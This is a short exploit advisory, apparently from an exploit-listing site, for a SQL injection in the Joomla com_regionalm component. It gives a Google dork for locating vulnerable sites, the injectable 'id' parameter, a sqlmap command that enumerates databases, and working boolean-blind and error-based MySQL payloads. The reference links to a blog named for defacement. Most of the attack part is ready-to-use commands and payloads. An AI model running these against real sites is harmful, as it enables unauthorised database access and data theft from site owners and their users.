Joomla! Com_regionalm SQL Injection

2018.12.17

Security007 (ID)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: inurl:index.php?option=com_regionalm

Author : Security007
Tested on : ubuntu 18.04
Vendor Homepage : http://www.joomla.org
Dork : inurl:index.php?option=com_regionalm
Parameter : id (GET)
Injection point : http://localhost/index.php?option=com_regionalm&task=regionalmuseum&id=12[ Inject Here ]&Itemid=139&lang=en

Proof Of Concept:
sqlmap -u "http://localhost/index.php?option=com_regionalm&task=regionalmuseum&id=12&Itemid=139&lang=en " --risk=3 --level=5 --random-agent --dbs -p id

Parameter: id (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (DUAL)
Payload: option=com_regionalm&task=regionalmuseum&id=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)

Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
Payload: option=com_regionalm&task=regionalmuseum&id=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

References:

https://defacementsec007.blogspot.com/2018/12/joomla-comregionalm-sql-injection-0day.html

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Joomla! Com_regionalm SQL Injection

Dork: inurl:index.php?option=com_regionalm

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.